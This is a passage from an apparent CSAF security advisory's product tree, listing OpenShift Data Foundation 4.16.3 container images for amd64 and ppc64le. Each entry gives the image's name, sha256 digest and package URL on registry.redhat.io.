"odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product_id: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product_id: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product_id: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product_id: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product: { name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product_id: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product: { name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product_id: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product: { name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product_id: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product_id: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product_id: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a?arch=amd64&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product_id: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product: { name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product_id: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388?arch=amd64&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product: { name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product_id: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product: { name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product_id: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product_identification_helper: { purl: 